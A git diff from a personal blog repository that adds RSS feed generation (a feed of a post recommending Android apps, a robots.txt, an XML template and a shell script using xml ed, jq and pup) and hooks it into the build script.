+app works better when you're rooted, but it's way better than the google play
+store.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     App store
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://gitlab.com/AuroraOSS/auroradroid"&gt;
+     aurora f-droid
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Password manager
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/bitwarden/mobile"&gt;
+     bitwarden
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Browser
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://www.bromite.org/"&gt;
+     bromite
+    &lt;/a&gt;
+    . This is basically ungoogled
+chromium but for mobile.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Calendar
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/Etar-Group/Etar-Calendar"&gt;
+     etar
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;a href="https://github.com/etesync/android"&gt;
+     etesync
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     File browser
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://github.com/zhanghai/MaterialFiles"&gt;
+     material
+files
+    &lt;/a&gt;
+    . It looks sexy, it's free,
+it's awesome.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Email client
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://email.faircode.eu/"&gt;
+     fairemail
+    &lt;/a&gt;
+    . STOP CRYING.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Maps
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://osmand.net/"&gt;
+     osmand
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Music player
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://www.shuttlemusicplayer.com/"&gt;
+     shuttle
+    &lt;/a&gt;
+    . It looks
+sexy, it's free, it's awesome.
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Instant messenger
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://signal.org/"&gt;
+     signal
+    &lt;/a&gt;
+    .
+    &lt;a href="https://twitter.com/elonmusk/status/1347165127036977153"&gt;
+     papa musk said
+it
+    &lt;/a&gt;
+    .
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     Manga reader
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://tachiyomi.org/"&gt;
+     tachiyomi
+    &lt;/a&gt;
+   &lt;/p&gt;
+  &lt;/li&gt;
+  &lt;li&gt;
+   &lt;p&gt;
+    &lt;strong&gt;
+     To-do lists
+    &lt;/strong&gt;
+    :
+    &lt;a href="https://tasks.org/"&gt;
+     tasks.org
+    &lt;/a&gt;
+    . This is easily the best
+to-do app I've ever used, and it integrated very well with etesync.
+   &lt;/p&gt;
+  &lt;/li&gt;
+ &lt;/ul&gt;
+ &lt;h3 id="closed-source"&gt;
+  Closed source
+ &lt;/h3&gt;
+ &lt;ul&gt;
+  &lt;li&gt;
+   &lt;strong&gt;
+    Reddit client
+   &lt;/strong&gt;
+   :
+   &lt;a href="https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync"&gt;
+    sync
+   &lt;/a&gt;
+  &lt;/li&gt;
+ &lt;/ul&gt;
+&lt;/div&gt;</description>
+    </item>
+  </channel>
+</rss>
diff --git a/public/robots.txt b/public/robots.txt
new file mode 100644
index 0000000..5b6f9d8
--- /dev/null
+++ b/public/robots.txt
@@ -0,0 +1,2 @@
+User-agent: *
+Disallow: /atom.xml
diff --git a/rss/base.xml b/rss/base.xml
new file mode 100644
index 0000000..daa65ad
--- /dev/null
+++ b/rss/base.xml
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="utf-8"?>
+<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
+	<channel>
+		<title>Loek's excruciatingly interesting blog</title>
+		<description>This is where I post updates on things that I do</description>
+		<language>en-us</language>
+		<link>https://blog.pipeframe.xyz/atom.xml</link>
+		<atom:link href="https://blog.pipeframe.xyz/atom.xml" rel="self" type="application/rss+xml" />
+	</channel>
+</rss>
diff --git a/rss/genrss b/rss/genrss
new file mode 100755
index 0000000..7cfd005
--- /dev/null
+++ b/rss/genrss
@@ -0,0 +1,27 @@
+#!/bin/sh
+
+cd $(dirname $0)
+
+# exit if no out dir
+[[ ! -d ../out ]] && exit 1
+
+cp base.xml atom.xml
+for file in ../out/post/*; do
+	base=$(basename "$file" .html)
+
+	xml ed -L \
+		-s '/rss/channel' -t elem -n item \
+		--var newitem '$prev' \
+		-s '$newitem' -t elem -n title -v "$(../scripts/meta title "../posts/${base}.md" | jq --raw-output)" \
+		-s '$newitem' -t elem -n guid -v "$base" \
+		-s '$newitem' -t elem -n link -v "/post/$base" \
+		-s '$newitem' -t elem -n pubDate -v "$(../scripts/meta date "../posts/${base}.md" | jq --raw-output)" \
+		-s '$newitem' -t elem -n description -v "$(pup -f "../out/post/${base}.html" .contentWrapper)" \
+		atom.xml
+done
+
+mv atom.xml ../public
+
+cd ..
+npx next build
+npx next export
diff --git a/scripts/build b/scripts/build
index b9c5dd0..0a5e246 100755
--- a/scripts/build
+++ b/scripts/build
@@ -15,6 +15,9 @@ npx next build
 echo "-> exporting static files..."
 npx next export
 
+echo "-> generating atom.xml..."
+./rss/genrss
+
 echo "-> cleaning $web_root..."
 rm -rf $web_root/*
 
diff --git a/scripts/postinfo b/scripts/postinfo
index c2a1597..d6da015 100755
--- a/scripts/postinfo
+++ b/scripts/postinfo
@@ -1,5 +1,7 @@
 #!/bin/sh
 
+cd "$(dirname $0)"
+
 filename=$1
 
 jq -n \